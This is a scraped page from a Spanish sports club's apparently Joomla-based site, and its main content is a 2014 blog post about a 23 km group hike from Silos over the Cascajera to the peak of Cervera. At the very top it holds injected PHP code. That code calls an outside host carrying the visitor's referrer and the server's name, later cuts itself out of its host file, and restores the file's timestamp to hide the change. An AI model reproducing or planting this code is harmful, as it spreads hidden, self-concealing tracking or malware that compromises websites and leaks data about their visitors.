check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } En el alto no habia cerveza, solo Cervera y su Cascajera.

La Afición

Calendario

<<  Marzo 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
    1  2  3  4  5
  6  7  8  9101112
13141516171819
20212223242526
2728293031  
Banner
Banner
Banner
Banner

Acceso Privado Equipo



En el alto no habia cerveza, solo Cervera y su Cascajera. PDF Imprimir E-mail
Martes, 29 de Abril de 2014 22:26

El día de Sábado Santo comenzamos nuestra temporada de caminatas. El día anterior no sabíamos cuantos íbamos a ir, pero tuvimos una agradable sorpresa ya que se presentaron 25 personas, muchas de ellas que no participaron en las rutas anteriores, lo cual alegra incluso más, marcamos la cita a las nueve en punto: Mª Jesús, Diego, Dori, Emilio, Visi, Raquel; Iñaki, Arantza, Justo, Alex, Vicente, Alberto, Marina, Mati, Jesús, Miguel Cámara, Miguel Malagueño, Juanito, Máxi, Toño, Mª Carmen, dos Hinojareños José y Balta, César y Kami.

 

Y la verdad que más o menos todos han sido puntuales, pero vivimos unos minutos de caos debido, a que aunque  ya que parecía que estábamos todos alguno se iba a casa porque se le olvidaba algo, pero por fin más o menos a las nueve y cuarto arrancamos nuestra primera marcha de temporada.

El tiempo era idóneo para hacer una caminata de estas características, teníamos un día soleado, con una temperatura agradable,

Teníamos 23 km por delante con una dificultad media en algunos tramos.

Salimos hacía las huertas dirección puente San Andrés, aquí cogimos un camino por el margen izquierdo de Mataviejas, después del viejo molino llegamos a  Ermita de Santa Cecilia, aquí nos reagrupamos ya que íbamos bastante desperdigados.

Después nos espera el primer repecho hasta Barriosuso, que es donde tomamos nuestra primera foto conmemorativa ya que dos integrantes del grupo vuelven a Silos.

En este punto comienza un bonito y duro ascenso, por una senda estrecha pero cómoda, una vez culminada la primera parte, nos reagrupamos de nuevo e inmortalizamos el momento, es decir un rato para respirar y suspirar (no por el cansancio, sino por el impresionante paisaje) pero estos suspiros también se debían a lo que nos esperaba y lo que veíamos por delante…..  la tan temida por much@s Cascajera.

Al final aunque impresiona, creo que todos nos dimos cuenta que no ha sido para tanto, subimos en fila india, ayudando nos unos a otros.

Una vez arriba seguimos el camino y ascendiendo un poco más nos presentamos a casi 1400 m, nos quedamos sin aliento, no tanto por el esfuerzo sino por las maravillosas vistas que nos ofrece la Peña o el alto de Cervera, momento que parte del grupo aprovecha para salir pitando hacía una de las partes más importantes de la ruta, la zona de Cervera que da a La Yecla y aquí ya las vistas pasan a un segundo plano, es la hora del…….ya no temido pero deseado ALMUERZO, se abren las mochilas se ocupan posiciones y empieza la carrera a dos papos, todos callados seguimos admirando las vistas pero llenando nuestras panzas..

 

Una vez nutridos e hidratados, momento foto al lado de la réplica de la iglesia de Hinojar con la placa conmemorativa de la Asociación Cultural de San Bartalomé estamos a 1387m exactamente.

Comenzamos el descenso dirección Hortezuelos, el grupo se estira y algunos comienzan a notar los primeros síntomas de cansancio.

Una vez llegamos a la carretera cerca de Hortezuelos, nos reagrupamos, algunos se quejan, de los pies, piernas e incluso las uñas resentidas.

Aquí se separan 4 andarines y toman la decisión de seguir por la carretera dirección la Yecla y después Silos, el resto se dirige hacía Hortezuelos para recargar las botellas de agua y tomar  dirección  Peñacoba. Finalmente no elegimos el camino “fácil”: todo por el Pinar sino que ”acortamos” por las tenadas, al principio senda cómoda, cuando perdemos la senda y preguntamos como no a nuestro serpa local Juanito enfilamos ladera arriba con toda la solana y entre piedra y piedra, a penas hay arena ni vegetación, en cuanto a la fauna suponemos que lagartijas. Parecía los Monegros pero empinado y en Peñacoba.

Llegamos a la cumbre en la que se agradece y mucho la sombra, nos juntamos y vamos en busca de camino de Serralba dirección a Peñacoba, camino muy amplio y cómodo.

Dejamos Peñacoba a la izquierda, la gente no se quiere hidratar solamente quieren llegar a Silos, eran casi las tres y el sol calentaba. Estamos en terreno conocido, el grupo acelera y  se alarga. En esta parte final de la ruta algunos integrantes del grupo empiezan a sentir, seriamente sus piernas y sus pies, pero ya queda poco y nadie se queja; próxima parada la Ermita de la Virgen del Camino en Silos, es donde nos reagrupamos una vez más y como no…. foto, tímido retoque de campana para anunciar la llegada, (era la hora de comer y nadie nos recibió).

Aquí nos despedimos y como siempre con muy buenas impresiones, un día maravilloso en buena compañía, algo cansados y con ganas de ir a comer a casa, pero muy satisfechos.

Desde el Club deportivo  Silos nos alegramos mucho de que cada vez se anime más gente y nos gustaría que aquellos que lo estéis leyendo u oigáis hablar de ello os animéis a participar en nuestra próxima ruta que en breve anunciaremos en la web del Club y en el Facebook y como no en los carteles, así que echadle un vistazo de vez en cuando.

 

Comentarios  

 
0 #1 Redacción 29-04-2014 23:20
Ya están colgadas fotos en galeria. Si alguien tiene más fotos y las quiere compartir las puede enviar a clubdeportivosi
Citar
 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.